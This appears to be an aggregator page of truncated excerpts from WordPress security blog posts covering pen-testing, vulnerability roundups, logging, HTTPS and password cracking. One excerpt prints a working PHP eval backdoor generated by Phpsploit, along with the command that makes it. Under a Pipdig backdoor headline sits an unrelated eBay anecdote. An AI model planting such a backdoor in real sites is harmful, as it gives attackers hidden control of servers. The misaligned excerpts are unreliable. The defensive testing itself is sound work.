Beyond maintenance, what else could you be doing to secure your WordPress website? Read this blog post to learn more.
Founded in 2012, Maintainn is owned and operated by WebDevStudios. Our mission at Maintainn is simple – to ensure your success! Maintainn takes the burden of maintaining your website off your hands by providing you with safe and reliable WordPress maintenance and support. Partner with us so you never have to worry about your website again.
A beginner's guide to penetration testing, highlighting the common security flaws to look for in WordPress websites, and some of the tools you can use to find these flaws and automated the testing.
WordPress powers a lot of websites on the Internet. So it’s no surprise that seasoned attackers and “script-kiddies” like to target WordPress websites. Whether you’re a webmaster, or a security professional, when tasked with assessing the security posture of a WordPress website, it tends to help to be aware of common security pitfalls attackers typically take advantage of. It is also important to use the right penetration testing tools. In this article, I’ll be covering a number of common security holes, malpractices and useful information an attacker may be able to abuse in many WordPress installations. I’ll also highlight a number of tools you can should use to help you automate the WordPress penetration test.
Heads up — Only perform security penetration testing on systems that belong to you, or you have been granted permission to. Understand the limits of the access you have been granted and stay within those limits.
Common WordPress security issues & malpractices
Running old versions of WordPress core containing security vulnerabilities is arguably one of the most common security holes relating to WordPress. While newer versions of WordPress
A team from two universities did an extensive testing of popular content management systems such as WordPress and found multiple vulnerabilities related to file uploads.
When it comes to content management systems such as WordPress, hackers will often exploit file upload mechanisms to distribute malicious files which can be used to execute malicious code on a website, infect other websites, and allow hackers to gain full control over a server where your website is hosted. In an effort to prevent exploiting file upload forms in content management systems, which are a popular way to build websites, a team of South Korean academics has developed FUSE, a new automated penetration testing tool.
Thanks to FUSE, they have discovered 30 vulnerabilities in various file upload mechanisms in 23 open-source web applications such as WordPress and other popular forum, store builder, and CMS platforms.
What Is FUSE?
FUSE relies on automated penetration testing to discover vulnerabilities in PHP applications that are a direct result of unrestricted file uploads as well as unrestricted executable file uploads, commonly referred to as UFU and UEFU vulnerabilities.
It was developed by a team of academics from the Korea Advanced Institute of Science and Technology Constitution (KAIST) and the Electronics and Telecommunications Research Institute (ETRI).
FUSE consists of
Prospects will only buy your products if your e-commerce store is secure, and if they trust it. Here are 10 things you should do to secure your WordPress ecommerce site and keep it secure.
There’s plenty you need to do to ensure your e-commerce store offers the best possible User Experience (UX). This means keeping WordPress and all other software up-to-date, optimizing your store, and of course, ensuring it’s safe to use and secure. By safe to use, we mean making your best to protecting your customer’s data. Also making sure nobody besides you or your team has access to your store’s back end. For example, choosing the right web host goes a long way towards offering a secure e-commerce experience. However, that’s just one of many factors.
In this article, we’re going to talk about why it’s so important for your WordPress e-commerce site to be secure. We’ll also walk you through eight ways to protect your ecommerce store. Let’s get right to it!
Why your WordPress e-commerce solution needs to be secure
We often talk about how to keep something secure. Though we very rarely explain why it needs to be secure, and what the benefits are.
You’ve probably made a few online purchases yourself. If your payment information are leaked because an e-commerce store you use got hacked, you’re not going to shop there again.
On finding, testing and fixing a long-forgotten race condition vulnerability in WooCommerce.
In continuation of yesterday’s post about bbPress, I decided to look for a more impactful race condition vulnerability. What’s more impactful on an online business than ecommerce? WooCommerce is up for the thread-safety test in this post and probably a couple of other to follow.
What changes with every sale most of the time? Product stock. In WooCommerce it’s decreased when an order is paid. The code responsible for this is currently located in WC_Product_Data_Store_CPT::update_product_stock. The docblock acknowledges that this method contains critical sections of code and that locking is used (spoiler: it’s not).
Uses queries rather than update_post_meta so we can do this in one query (to avoid stock issues). Uses locking to update the quantity. If the lock is not acquired, change is lost.
But looking at the actual body of the method you’re met (in version 4.0.1) with this comment:
// @todo: potential race condition. Read current stock level and lock the row. If the lock can’t be acquired, don’t wait.
Yikes! The lock was never implemented. It’s a tiny bit better than using a get_post_meta and update_post_meta chain, for one reason: doing
A quick summary of the WordPress infosec landscape for January 2020. Swords optional.
WordPress Security and Maintenance Releases: 5.2.4, 5.3.1, and 5.3.2 Pagely customers were spared issues from bugs introduced in the 5.3.0 release as, due to the proximity to the holidays, we didn’t upgrade our customers to 5.3 until early January. All Pagely customers received security patches for vulnerabilities identified in WordPress Core before 5.2.4 for the 5.2 branch and 5.3.1 for the 5.3 branch.
4 vulnerabilities found in WordPress Core:
Privilege Escalation (allowing any user to “sticky” a post)
XSS (Cross Site Scripting) Stored in well-crafted links
XSS in the Block Editor
Improved Security/Sanitization on wp_kses_bad_protocol()
Plugin/Theme Vulnerabilities of Note
InfiniteWP and WP-Time-Capsule
Two separate authentication bypass vulnerabilities were found in InfiniteWP and WP-Time-Capsule, both vulnerabilities were reported by WebARX:
These vulnerabilities pose a critically high risk to any site owners running insecure versions of either plugin. The vulnerability allows malicious parties the ability to bypass authentication and get a valid administrator login session via making a single request to a site running either plugin.
Links for more information:
Logs are like unsung heroes; they store a wealth of information, have an important role in any type of software, yet they are often ignored. This article highlights all the different type of logs WordPress administrators have available.
Logs for WordPress administrators – the definitive guide to all the logs WordPress site administrators can use. Logs are like unsung heroes; they store a wealth of information, have an important role in any type of software, yet they are often ignored.
October is a national cyber awareness month and therefore we have prepared this article together with WP Security Audit Logs, a company known as the “king of logs” in the WordPress ecosystem. Use WebARX20 to get a 20% discount form any WP Security Audit Logs plans here.
This quote from the PCI DSS compliance regulations highlights how important logs are for the security of websites:
Logging mechanisms and the ability to track user activities are critical in preventing, detecting, or minimizing the impact of a data compromise.
In this article, we will explain what logs are, what information you can find in them and how you can use this information to better manage and improve the security of your WordPress websites. Let’s dive right in.
Introduction To Logs
Logs are records of events related to a given software, application, or service. Most modern software products keep logs of some kind. This means everything
File integrity monitoring helps you stay ahead of security breaches and identify errors that could leave your WordPress website exposed to hack attacks.
A default and up-to-date WordPress installation with a strong password is quite secure. However, to survive on the internet that is not enough. That’s where File Integrity Monitoring (FIM) comes into play. A File Integrity Monitoring tool or plugin monitors your site’s files and alerts you for any changes like file uploads, edits, removals, and so on.
File integrity monitoring helps you stay ahead of security breaches and identify errors that could leave your website exposed to hack attacks.
In this post, we’ll provide you with a thorough introduction to file integrity monitoring and explain how it can improve your site’s security. We’ll also share a few different tools and plugins you can use to implement this security solution on your WordPress site.
Let’s get started!
An Introduction to File Integrity Monitoring
When it comes to protecting and maintaining infrastructures such as websites and servers, File Integrity Monitoring is key. This solution validates the integrity of a given environment, namely, it checks to see whether the contents of your site’s files have changed unexpectedly.
You can use File Integrity Monitoring to detect file
Prevention is better than cure, even in WordPress security. It is like an insurance, may you never need it, but it is always good to have it.
A common misconception is that malicious hackers only target websites with large income, or those that store valuable sensitive information. However, WordPress websites generally get a lot of unwanted attention, which is why it’s important to take preventive measures from the get-go. The good news is that (on top of basic measures such as having a robust updating strategy) WordPress offers you a lot of options to protect your website against hack attacks. Even simple implementations, such as enabling Two-Factor Authentication (2FA) can drastically improve the security of your website or eCommerce store.
In this article, we’ll talk about why preemptive WordPress security is the way to go. We will also highlight five preventive WordPress security measures, so you won’t have to deal with messy cleanups afterward. Let’s get to work!
Why prevention is essential in WordPress security
Spending time on preemptive security is a lot like getting travel insurance before heading to a safe and well-known country. It’s a step that’s usually forgotten about by many travelers – until your hotel room is ransacked. From then on, travel insurance is always a top
User trust once violated is very hard to regain. Be mindful to protect the trust you have earned.
Our writeup about a new XSS vulnerability in the Envira Photo Gallery WordPress plugin. Affecting about 100,000 WordPress installations
A high-severity Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2020-9334, exists in a popular WordPress plugin called Envira Photo Gallery, rendering over 100,000 websites vulnerable to phishing attacks, stealing administrator’s session tokens, etc. In this Blog-post, we will cover what caused the flaw, an example Proof-Of-Concept showing exploitation in a sandbox environment, and mitigation steps.
What is the Envira Photo Gallery Plugin ?
According to the official documentation of the plugin,
We believe that you shouldn’t have to hire a developer to create a WordPress gallery. That’s why we built Envira, a drag & drop photo gallery plugin that’s both EASY, FAST and POWERFUL.
What is the vulnerability and how does it work ?
I will explain this in 4 simple steps:
The plugin provides an authenticated user a drag & drop photo gallery feature in the control panel,
If a malicious user were to
Keeping a record of everything that happens on your #WordPress #website is just the beginning. You also need to backup your logs, control who accesses them, and ensure the setup is secure. To help you get started we've prepared a list of best practices for managing WordPress activity logs.
The data stored in the WordPress activity log is sensitive and confidential. So should you back it up? Should you archive it and keep it secure? Many compliance regulations stipulate who can access such data, and how such data should be stored, secured and backed up. This is common practise in the finance and healthcare industries. Typically they also stipulate for how long activity log data should be kept.
Therefore installing WP Security Audit Log to keep a log of user and site changes is just the beginning. As a business you are also responsible for the security and management of the WordPress activity logs (aka audit log or audit trail) on your website(s).
In this article we explain all you need to know about managing and maintaining the WordPress activity log data. We also explain how you can use the tools in WP Security Audit Log to manage and keep your WordPress activity logs secure and backed up.
Accessing old data
For how long should you keep the WordPress activity log data?
There are many factors to consider when deciding for how long you should retain your website’s activity log data:
Does your business has to comply with specific regulatory compliance requirements?
I'm testing one of the tools to create and control PHP-backdoor. In this test i'm backdooring one of the WordPress included files
As many of you know, WordPress is written in PHP. Finding backdoors in PHP and WordPress code can be quite tricky and sometimes almost impossible: Since backdoors could be hidden anywhere in the code and look like regular code with human coding errors, and a regular installation of WordPress consists of about 432,709 lines of PHP-code. So instead of reading all the code and looking for backdoors we could use automated tools like antivirus-software, and a popular open source antivirus software is ClamAV.
Today we are going to test the offensive Command and Control (C2) software Phpsploit, described as below from their Github page:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[‘HTTP_PHPSPL01T’]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
The same as with insurance, many administrators only realize how important activity logs are when $h*t happens! However, in such cases it is too late! If you do not have a WordPress activity log plugin installed, you cannot find out what happened on your website.
When users uninstall the WP Security Audit Log plugin from their WordPress website we ask them why they would like to uninstall the plugin. The most common answer is we no longer need it. In other words, the website administrator no longer needs to keep a log of changes that happen on the website. To me and everyone in security, this raises some red flags. It is ineffective to keep a log of changes on any system when used retroactively, after an error or breach occurs. WP Security Audit Log is a powerful WordPress administrator plugin, but only if used properly.
In this post we share four key reasons that highlight how important it is to always keep a log of user and site changes, not just when you think you need to.
4 key reasons to always keep a record of site and users changes in a WordPress activity log
1. Activity logs (and monitoring) are a WordPress security staple
There are several ways to secure and protect your WordPress site. For example you can add two-factor authentication, and setup a WordPress firewall and strong password policies. However, security is not a one time fix, but a process.
That is why WordPress activity logs are also an important component of a WordPress
Here we go again. There's a company out there making security flaws public, without talking the the plugin authors.
A US-based cyber-security firm has published details about two zero-days that impact two of Facebook's official WordPress plugins. The details also include proof-of-concept (PoC) code that allows hackers to craft exploits and launch attacks against sites using the two plugins.
The two zero-days impact "Messenger Customer Chat," a WordPress plugin that shows a custom Messenger chat window on WordPress sites, and "Facebook for WooCommerce," a WordPress plugin that allows WordPress site owners to upload their WooCommerce-based stores on their Facebook pages.
The first plugin is installed by over 20,000 sites, while the second has a userbase of 200,000 -- with its statistics exploding since mid-April when the WordPress team decided to start shipping the Facebook for WooCommerce plugin as part of the official WooCommerce online store plugin itself.
Since then, the plugin has garnered a collective rating of 1.5 stars, with the vast majority of reviewers complaining about errors and a lack of updates.
Nevertheless, despite the bad reputation, today, the security of all users who installed these extensions was put at risk because of a stupid grudge
WordPress HTTPS, SSL and TLS for #WordPress administrators - in this article you will find everything you need to know about these protocols and how to configure HTTPS on your #website.
When you visit a website, your browser (also known as a client) sends a HTTP request to a web server. Once the web server sends an HTTP response, the browser can then render the page to your screen. However, HTTP traffic has a problem; it is a plaintext protocol. This makes it susceptible to snooping and meddling. If an attacker is on the same network as you they can intercept and read your HTTP traffic. They may also modify both your requests to the server, as well as the server’s responses back to you. This is known as a Man-in-the-Middle (MitM) attack. This can easily happen on public WiFi’s, such as the ones in hotel lobbies and public spaces.
That is why a website should be on HTTPS – so traffic cannot be intercepted. This article explains what HTTPS, SSL and TLS are. It also explains how you can configure your WordPress website to work on HTTPS.
What is SSL/TLS?
Once the internet started to grow in use, it became obvious that we needed a mechanism to securely transfer information between a client and server without anyone being able to eavesdrop or modify traffic — enter SSL, or Secure Socket Layer. SSL is an Internet security protocol, first developed
Pipdig Power Pack versions up to 4.7.3 contain the backdoor code, which has been removed as of version 4.8.0
Karl is off work this week (due to working in a school, lots of holidays, lucky bastard, bla bla bla). I asked him this morning to try and purchase the replacement keyboard for my laptop, as linked from my “OMG DISASTER” entry update, now that we’ve transferred money to the “Internet account”. He spent all afternoon trying to get them to accept the payment details/address etc with no luck. I returned from work (due to not working in a school and having crap normal holidays, bla bla bla) and we decided to resort to e-Gay e-Bay. I, of course, am terribly negatively biased against them since they allowed some tit up the road to sell stolen cameras using Karl’s mum’s address, causing the coppers to come and take away my laptop. Long story short, we registered there anyway and proceeded to “Click to Buy” a replacement VAIO keyboard/case that we found: £30.00 for the item, £8.00 post and packaging.
We went through, entered the details into PayPal, reviewed everything and clicked “Pay”. We received an error telling us that the seller did not accept payment through this method (despite the preferred method being paypal?)
Hashcat is a free tool to crack passwords (hashes) using GPU power
When it comes to complex password cracking, hashcat is the tool which comes into role as it is the well-known password cracking tool freely available on the internet. The passwords can be any form or hashes like SHA, MD5, WHIRLPOOL etc. Hashes does not allow a user to decrypt data with a specific key as other encryption techniques allow a user to decrypt the passwords. Hashcat uses certain techniques like rainbow tables, dictionary attack or rather it can be the brute-force technique as well. This article gives an example of usage of hashcat that how it can be used to crack complex passwords of WordPress. Hashcat in an inbuilt tool in Kali Linux which can be used for this purpose.
If a user wants to look that what hashcat facilitates, by running hashcat –help as shown below:
Some pictures are given below as example:
- [ Outfile Formats ] -
# | Format
1 | hash[:salt]
2 | plain
3 | hash[:salt]:plain
4 | hex_plain
5 | hash[:salt]:hex_plain
6 | plain:hex_plain
7 | hash[:salt]:plain:hex_plain
8 | crackpos
9 | hash[:salt]:crack_pos
10 | plain:crack_pos
11 | hash[:salt]:plain:crack_pos
12 | hex_plain:crack_pos
13 | hash[:salt]:hex_plain:crack_pos
An update to our vulnerability disclosure policy. 30 days - no exception.
This post is about the realities both good and bad that come with the responsibility of reporting vulnerabilities. The long days of summer are gone, fall has faded away and winter is upon us… reflecting back over the past months the Pagely security team spent some of those days uncovering and reporting a number of unreleased exploits (or 0days) being used against our customers’ sites. It’s just part of the job. When securing sites we see what vulnerabilities attackers are using and how they work, and as an extension of that task, we make sure plugin authors are notified about the vulnerability so they can apply a patch.
It’s a fantastic feeling when we see an actively targeted vulnerable plugin getting patched and secured, but that feeling only comes after the patch gets applied. Just like the feeling of the first fall colors coming in, summer must heed to fall, to allow the shorter, cooler days to prevail. If we had 365 days of summer, then the world would be a barren wasteland. Much like the seasons, vulnerability reports need to be handled swiftly, before the users of the software get burned by attackers.
The time spent waiting for the patch can be stressful,
Learn how we implement SSO using WordPress and Google accounts.
Single Sign-On (SSO) is one of those features every pointy-haired boss in the world wants on their websites. Managing user accounts and passwords across dozens of work-related sites gets very old, very quickly. The longer time went on, the greater the need for an SSO solution at WebDevStudios (WDS) became. I’ll tell you a little about our implementation of Single Sign-On using WordPress and Google accounts, and how it helps both WDS and our clients simultaneously. What is it?
In the simplest terms, Single Sign-On is a way for someone to access multiple websites using one set of username and password credentials.
The WDS-specific implementation uses Google authentication, primarily because we use the Google apps suite for our work tools. But WDS-SSO can easily support any standard OAuth service. Here’s a list of features we built into our SSO solution:
Google Auth support (including Two-Factor Authentication)
Client/Proxy configuration makes setup a one-time task
Enforces all sites involved to use HTTPS
Selective role maps (including Super Admin) for individuals and/or sites
Support for selective (multiple)
Consultant Joe Youngblood talks about a default setting in Yoast that makes it easier for hacker to harvest usernames, which means hackers have one-half of the combination for automated brute force attacks.
TL;DR WordPress creates Author Archives pages for anyone who publishes content on a website sometimes keeping that page live even if that content is transferred to another user.
By default WordPress uses the ‘username’ a user logins in with for the Author Archive page URL and offers no way of changing this.
When Yoast is installed sitemaps are activated by default creating an Author Archive sitemap which contains all the Author URLs complete with usernames.
Hackers can use this file to gain important usernames for a website, making hacking easier by only needing to guess passwords.
This attack vector can be patched by turning off Author Archives in Yoast or if Author Archives are required by editing the URL of author archives in the WordPress code.
Update: Yoast was notified of my concerns earlier this week, has fully reviewed them, and responded. Essentially in their response they stated this wasn’t much of a concern to them though they had discussed it and offered tips. I’ve placed their entire response at the bottom of this article, you can get there by clicking here.
Yoast is a wildly popular WordPress plugin that helps websites become more SEO friendly.
Website maintenance and security are vital. You put time, effort and money into your business so why not make sure everything is always up and running the way it should be?
Website maintenance and security are a crucial element of your business. You put a lot of time and money into your online image as it represents your business, so why not ensure it stays up, runs smooth, and never has downtime. Even if your website is only used to provide informational content about your products or services, your website can be compromised if you don’t perform website maintenance and management on a regular basis. The last thing you want to deal with is hackers. They can bring down your website and create a problem for your business and your customers. So, what can you do? We’ll tackle each important task one at a time, but here is what you’ll learn:
The Main Website Maintenance and Security Master List
It’s actually pretty simple. Let’s take a look at 16 tips to maintain your website’s security so you won’t fall victim to hackers or other online threats. When you follow this master list, you’ll see that your website stays in tip top shape at all times. And, that’s what you want for the face of your business!
1. How Often Should You Backup Your Website
I’m sure the idea of backups is nothing new to you. Backups
This is a story of how I nearly lost 15 years of photos because I systematically deleted everywhere the backup was - starting with Flickr.com. Luckily, I had enough copies, due to a good backup strategy, that they were saved. Here's how.
Over the weekend I had a bit of a scare. I was thinking about my trip to Ireland – a trip I took nearly 15 years ago – and I decided to take a walk down memory lane. Since those photos were on Flickr and I decided to delete Flickr earlier this year, I went to the Photos app, assuming I added them. No dice. OK – I’ll check my Time Machine back up. Not there either. Luckily, they were somewhere. But not before I started to panic. What Happened to my Photos?
Well, the short of it is I downloaded my Flickr photos on my PC, the day before my iMac Pro came. No problem – I had a backup, right?
My Backup System
On my PC, I had a 3-pronged approach to backups:
Getting Rid of the PC
So as I said, my iMac Pro came the day after I backed up my Flickr account. So the Flickr account is gone, and at this point, the archive exists on the PC, and Backblaze. Then this series of events happened:
I waited a couple of weeks to wipe the PC to make sure I didn’t need anything. I wiped it when I sold it. That would be the main drive, and the bulit-in SSD Drive
I kept the Backblaze account until it was time for me to renew my billing – that was about 7 months after
WordPress security is super important. But, as times change, knowing which classic WordPress security advice to follow and not to follow isn't easy. David Hayes of WPShout fame shares advice on what not to worry about.
Following last week’s post about WordPress security, in this post, I’ll start with advice I see commonly in other places that I don’t see much point in doing. Most of this advice is nearly harmless to slightly beneficial if it’s done. But the reason I don’t recommend it is that its benefits (where they exist) are so small. And the possibility that spending time on them makes you ignore more-valuable security practices is big. You’re free to do these, but I just don’t think they’re worth the time invested because the gains they give are very small. Don’t Bother: Hide WordPress Version
We’re starting with the most useless piece of common security advice—that you should hide your WordPress version number, or that you’re using WordPress. The second is very hard to do in a serious way, and the first is basically valueless.
Hiding that you’re running WordPress is hard, and most people are trying to do it merely by changing or eliminating a <meta> tag in their site. No reasonably intelligent botnet builder is going to be relying on that, and many webmasters of non-WordPress sites report that they see people